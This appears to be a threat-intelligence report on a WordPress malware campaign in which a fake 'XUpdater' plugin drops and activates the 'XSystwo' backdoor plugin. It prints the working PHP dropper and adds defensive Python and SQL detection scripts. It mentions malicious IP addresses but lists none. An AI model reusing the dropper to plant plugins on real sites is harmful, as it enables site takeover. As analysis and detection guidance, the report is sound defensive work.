New Malware Campaign: XUpdater and XSystwo
A new malware campaign has been identified that targets WordPress installations and uses previously compromised credentials for initial access. Our research team uncovered a two-stage infection: a dropper disguised as a legitimate WordPress plugin, followed by a second plugin that carries the actual malicious functionality.
Infection Vector: Compromised Credentials and Initial Dropper
The first stage relies on previously compromised credentials, most likely obtained through earlier data breaches, phishing, or brute-force attacks. Once the attackers can log in to the target site's WordPress administrative panel, they upload and activate a fake plugin that acts as the primary dropper.
The dropper is deceptively simple and is written in plain, unobfuscated PHP. It carries no obfuscation that would trip a heuristic scanner, and because the plugin name, function suffix and bundled archive name change from sample to sample, naive signature matching on file names or hashes tends to miss it. The plugin names observed follow the pattern "XUpdater" with an incrementing number, such as:
- XUpdater14
- XUpdater15
- XUpdater16
- ...and subsequent variations.
The only job of the "XUpdater" dropper is to install and activate the second stage, which is the plugin that contains the malware. On activation it extracts a ZIP archive shipped inside its own plugin directory (the archive name varies per sample; in this case Sys3847LockU.zip) into wp-content/plugins/ and then activates the resulting XSystwo plugin. It also initialises three wp_options entries (xwp_curr_posts, xwp_last_create, xwp_key), which are useful database indicators. The following sample is the XUpdater15 variant of the dropper; note that the plugin header advertises it as "XWP Installer15" while the function name carries the same variant number:
<?php
/**
 * Plugin Name: XWP Installer15
 * Description: XWP Installer15
 * Version: 1.2
 * Author: WordPress
 */

// Runs once, when an administrator activates the fake plugin.
register_activation_hook(__FILE__, 'xwp_installer_activate_15');

function xwp_installer_activate_15() {
    // The second-stage archive ships inside the dropper's own directory.
    $zip_file     = plugin_dir_path(__FILE__) . 'Sys3847LockU.zip';
    $plugin_dir   = ABSPATH . 'wp-content/plugins/';
    $plugin_entry = 'XSystwo/XSystwo.php';

    // Reset three wp_options entries to 0 (these names are good database indicators).
    update_option('xwp_curr_posts', 0);
    update_option('xwp_last_create', 0);
    update_option('xwp_key', 0);

    // Pull in the core helpers that provide unzip_file() and activate_plugin().
    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/plugin.php';
    WP_Filesystem();
    global $wp_filesystem;

    if (file_exists($zip_file)) {
        // Extract the payload directly into wp-content/plugins/.
        $result = unzip_file($zip_file, $plugin_dir);
        if (function_exists('wp_clean_plugins_cache')) {
            wp_clean_plugins_cache(true);
        }
        sleep(1);
        // Activate XSystwo so its code runs on every request from now on.
        if (!is_plugin_active($plugin_entry)) {
            $activation = activate_plugin($plugin_entry);
        }
    }
}
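The dropper above leaves several filesystem traces: a plugin directory named XUpdater<N>, a ZIP archive sitting next to plugin code, a PHP file that combines register_activation_hook() with unzip_file() and activate_plugin(), the xwp_ option names, and an "Author: WordPress" header. The following script is an added triage example (not code from the original report or from the malware) that walks a wp-content/plugins tree and reports each of those indicators. The indicator names, the build_sample_tree() fixture and the benign hello-dolly plugin are constructed for the demonstration; the directory names, payload paths and option names come from the report.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the report: plugin directory names and payload paths.
SUSPECT_DIR_PATTERNS = [re.compile(r"^XUpdater\d+$"), re.compile(r"^XSystwo$")]
PAYLOAD_FILES = (
    "XSystwo/XSystwo.php",
    "XSystwo/ID200/class.01.php",
    "XSystwo/ID200/ID200.php",
    "XSystwo/ID100/SXCAPTH.php",
)
OPTION_NAMES = ("xwp_curr_posts", "xwp_last_create", "xwp_key")
# Behavioural signature of the dropper: an activation hook that unzips an
# archive and activates another plugin. Legitimate installer plugins can do
# this too, so a hit here is a triage lead, not a verdict.
DROPPER_CALLS = ("register_activation_hook", "unzip_file", "activate_plugin")
AUTHOR_HEADER = re.compile(r"^\s*\*?\s*Author:\s*WordPress\s*$", re.MULTILINE)


def scan_plugins_dir(plugins_dir):
    """Return (indicator, path relative to plugins_dir) tuples for a plugins tree."""
    root = Path(plugins_dir)
    findings = []
    for entry in sorted(root.iterdir()):
        if entry.is_dir() and any(p.match(entry.name) for p in SUSPECT_DIR_PATTERNS):
            findings.append(("suspect_dir", entry.name))
    for rel in PAYLOAD_FILES:
        if (root / rel).is_file():
            findings.append(("payload_file", rel))
    for php in sorted(root.rglob("*.php")):
        rel = php.relative_to(root).as_posix()
        src = php.read_text(errors="replace")
        if all(call in src for call in DROPPER_CALLS):
            findings.append(("dropper_behaviour", rel))
        if any(name in src for name in OPTION_NAMES):
            findings.append(("xwp_option", rel))
        if AUTHOR_HEADER.search(src):
            findings.append(("author_wordpress", rel))
    # Installed plugins do not normally ship .zip archives next to their code.
    for archive in sorted(root.rglob("*.zip")):
        findings.append(("bundled_zip", archive.relative_to(root).as_posix()))
    return findings


def build_sample_tree(root):
    """Constructed fixture: one dropper, a partial payload, one benign plugin."""
    root = Path(root)
    dropper = root / "XUpdater15"
    dropper.mkdir(parents=True)
    (dropper / "XUpdater15.php").write_text(
        "<?php\n/**\n * Plugin Name: XWP Installer15\n * Author: WordPress\n */\n"
        "register_activation_hook(__FILE__, 'xwp_installer_activate_15');\n"
        "function xwp_installer_activate_15() {\n"
        "    update_option('xwp_key', 0);\n"
        "    unzip_file(plugin_dir_path(__FILE__) . 'Sys3847LockU.zip', ABSPATH . 'wp-content/plugins/');\n"
        "    activate_plugin('XSystwo/XSystwo.php');\n}\n"
    )
    # Minimal empty ZIP (end-of-central-directory record only); only the name matters here.
    (dropper / "Sys3847LockU.zip").write_bytes(b"PK\x05\x06" + b"\x00" * 18)
    for rel in PAYLOAD_FILES[:2]:
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text("<?php // placeholder standing in for the second stage\n")
    benign = root / "hello-dolly"
    benign.mkdir()
    (benign / "hello.php").write_text(
        "<?php\n/**\n * Plugin Name: Hello Dolly\n * Author: Matt Mullenweg\n */\n"
    )
    return root


def demo_scan():
    """Build the constructed tree in a temp directory and scan it."""
    return scan_plugins_dir(build_sample_tree(tempfile.mkdtemp()))


if __name__ == "__main__":
    for indicator, path in demo_scan():
        print(f"{indicator:18} {path}")
```

Point scan_plugins_dir() at a real wp-content/plugins directory to run it against a live site. The dropper_behaviour and author_wordpress indicators are weak on their own; a suspect_dir, payload_file or bundled_zip hit together with either of them is what you act on.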
The Malicious Payload: XSystwo
The second stage is the plugin extracted and activated by the dropper, which the attackers named XSystwo. It is the core component of the campaign and performs the actual malicious activity: creating a rogue WordPress Administrator account tied to a wordpress[.]com e-mail address, injecting SEO spam, and disabling caching plugins.
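The rogue Administrator account, the xwp_ options set by the dropper and the activation of XSystwo/XSystwo.php all leave traces in the WordPress database. The following added example (not part of the original report) shows the three queries a responder would run, exercised against a constructed in-memory SQLite copy of the relevant tables. It assumes the default wp_ table prefix, that capabilities are stored PHP-serialized in {prefix}usermeta under {prefix}capabilities as WordPress does, and that the rogue admin's address is at wordpress.com; the user rows and option values are constructed sample data.

```python
import sqlite3

# Serialized PHP array WordPress stores for an administrator role.
ADMIN_CAPS = 'a:1:{s:13:"administrator";b:1;}'
CAMPAIGN_OPTIONS = ("xwp_curr_posts", "xwp_last_create", "xwp_key")
PAYLOAD_ENTRY = "XSystwo/XSystwo.php"


def find_rogue_admins(conn, prefix="wp_", email_domain="wordpress.com"):
    """Administrators whose e-mail is at email_domain, oldest registration first."""
    sql = f"""
        SELECT u.ID, u.user_login, u.user_email, u.user_registered
        FROM {prefix}users u
        JOIN {prefix}usermeta m ON m.user_id = u.ID
        WHERE m.meta_key = '{prefix}capabilities'
          AND m.meta_value LIKE '%"administrator"%'
          AND LOWER(u.user_email) LIKE ?
        ORDER BY u.user_registered
    """
    return conn.execute(sql, (f"%@{email_domain}",)).fetchall()


def find_campaign_options(conn, prefix="wp_"):
    """The wp_options rows the dropper initialises; any presence is suspicious."""
    placeholders = ",".join("?" * len(CAMPAIGN_OPTIONS))
    sql = (f"SELECT option_name, option_value FROM {prefix}options "
           f"WHERE option_name IN ({placeholders})")
    return conn.execute(sql, CAMPAIGN_OPTIONS).fetchall()


def payload_is_active(conn, prefix="wp_"):
    """True if XSystwo is listed in the serialized active_plugins option."""
    row = conn.execute(
        f"SELECT option_value FROM {prefix}options WHERE option_name = 'active_plugins'"
    ).fetchone()
    return bool(row) and PAYLOAD_ENTRY in row[0]


def build_sample_db():
    """Constructed fixture mimicking the three WordPress tables involved."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT,
                                 option_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", [
        (1, "siteowner", "owner@example.org", "2021-03-01 10:00:00"),
        (2, "editor", "editor@example.org", "2022-06-15 09:30:00"),
        (3, "wpsupport", "sup3rv1sor@wordpress.com", "2024-11-02 03:14:07"),  # constructed rogue admin
    ])
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", [
        (1, 1, "wp_capabilities", ADMIN_CAPS),
        (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, 3, "wp_capabilities", ADMIN_CAPS),
    ])
    conn.executemany("INSERT INTO wp_options VALUES (?,?,?)", [
        (1, "active_plugins",
         'a:2:{i:0;s:19:"akismet/akismet.php";i:1;s:19:"XSystwo/XSystwo.php";}'),
        (2, "xwp_key", "0"),
        (3, "xwp_last_create", "0"),
        (4, "blogname", "Example Site"),
    ])
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    print("rogue admins:", find_rogue_admins(db))
    print("campaign options:", find_campaign_options(db))
    print("XSystwo active:", payload_is_active(db))
```

The same SQL runs unchanged against MySQL from the mysql client once you substitute the site's real table prefix. A wordpress[.]com address on an Administrator account is an indicator, not proof; compare each hit against the list of accounts the site owner recognises and look at the registration timestamp and the account's last login before deleting it.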
Below are the most interesting files:
./XSystwo/XSystwo.php
./XSystwo/ID200/class.01.php
./XSystwo/ID200/ID200.php
./XSystwo/ID100/SXCAPTH.php
Indicators of Compromise (IoC)
Security administrators are urged to check their WordPress installations immediately for the following and to monitor network traffic for connections to the malicious IP addresses identified during the investigation:
- Plugin directories named XUpdater followed by a number (the sample above presents itself as "XWP Installer15"), or named XSystwo
- The XSystwo files listed above, in particular ID200/class.01.php, ID200/ID200.php and ID100/SXCAPTH.php
- ZIP archives stored inside a plugin directory
- The wp_options entries xwp_curr_posts, xwp_last_create and xwp_key
- Administrator accounts tied to a wordpress[.]com e-mail address that the site owner does not recognise
- Injected SEO spam in posts or pages, and caching plugins that have been deactivated without explanation
Because initial access came through valid credentials, removing the plugins and the rogue account is not sufficient: reset the passwords of all administrative accounts and any reused credentials, and review recent logins for the same source addresses.
Note: The IP addresses referenced are those observed during this investigation; validate them against your own threat intelligence feeds before blocking.